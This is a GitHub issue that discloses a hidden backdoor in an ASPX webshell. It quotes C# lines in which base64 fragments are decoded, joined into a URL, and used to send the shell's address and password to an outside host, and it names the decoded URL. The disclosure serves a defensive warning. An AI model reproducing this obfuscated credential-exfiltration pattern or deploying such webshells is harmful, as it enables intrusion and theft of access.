-
Notifications
You must be signed in to change notification settings - Fork 1k
Open
Description
Here is one I found.
Line 54 in f7cd87f
| HttpWebRequest request = (HttpWebRequest)HttpWebRequest.Create(YfCnP + this.Request.Url.ToString() + pbzw + Password + ""); HttpWebResponse response = (HttpWebResponse)request.GetResponse(); |
Variable
YfCnP is base64 encoded.Lines 39 to 49 in f7cd87f
| string YfCnP = sh; | |
| YfCnP += portble; | |
| YfCnP += vcf; | |
| YfCnP += dwgtg; | |
| YfCnP += bin_data; | |
| YfCnP += fuze; | |
| YfCnP += ouj; | |
| YfCnP += tprq; | |
| YfCnP += idodr; | |
| YfCnP += mtg; | |
| YfCnP += ksgr; |
Lines 519 to 529 in f7cd87f
| ksgr = Encoding.Default.GetString(Convert.FromBase64String(ksgr)); | |
| mtg = Encoding.Default.GetString(Convert.FromBase64String(mtg)); | |
| idodr = Encoding.Default.GetString(Convert.FromBase64String(idodr)); | |
| tprq = Encoding.Default.GetString(Convert.FromBase64String(tprq)); | |
| ouj = Encoding.Default.GetString(Convert.FromBase64String(ouj)); | |
| fuze = Encoding.Default.GetString(Convert.FromBase64String(fuze)); | |
| bin_data = Encoding.Default.GetString(Convert.FromBase64String(bin_data)); | |
| dwgtg = Encoding.Default.GetString(Convert.FromBase64String(dwgtg)); | |
| vcf = Encoding.Default.GetString(Convert.FromBase64String(vcf)); | |
| portble = Encoding.Default.GetString(Convert.FromBase64String(portble)); | |
| sh = Encoding.Default.GetString(Convert.FromBase64String(sh)); |
Line 2081 in f7cd87f
| string sh = "aHR0"; |
Line 1724 in f7cd87f
| string portble = "cDovLw=="; |
Line 1662 in f7cd87f
| string vcf = "d3c="; |
Line 1561 in f7cd87f
| string dwgtg = "dy50cm95"; |
Line 1495 in f7cd87f
| string bin_data = "cGxhbi4="; |
Line 1466 in f7cd87f
| string fuze = "Y29tL2FydGlj"; |
Line 1449 in f7cd87f
| string ouj = "bGUvaQ=="; |
Line 1297 in f7cd87f
| string tprq = "bmZvLw=="; |
Line 1179 in f7cd87f
| string idodr = "Z2suYXM="; |
Line 589 in f7cd87f
| string mtg = "cHg="; |
Line 499 in f7cd87f
| string ksgr = "P25hbWU9"; |
Decode
YfCnP:http://www.troyplan.com/article/info/gk.aspx?name=Maybe there are more backdoors in webshells, use with caution.
Don't be evil.
ViCrack and ylyangElleFrederikMartim, PettterWang, Van-1337 and ViCrack
Metadata
Metadata
Assignees
Labels
No labels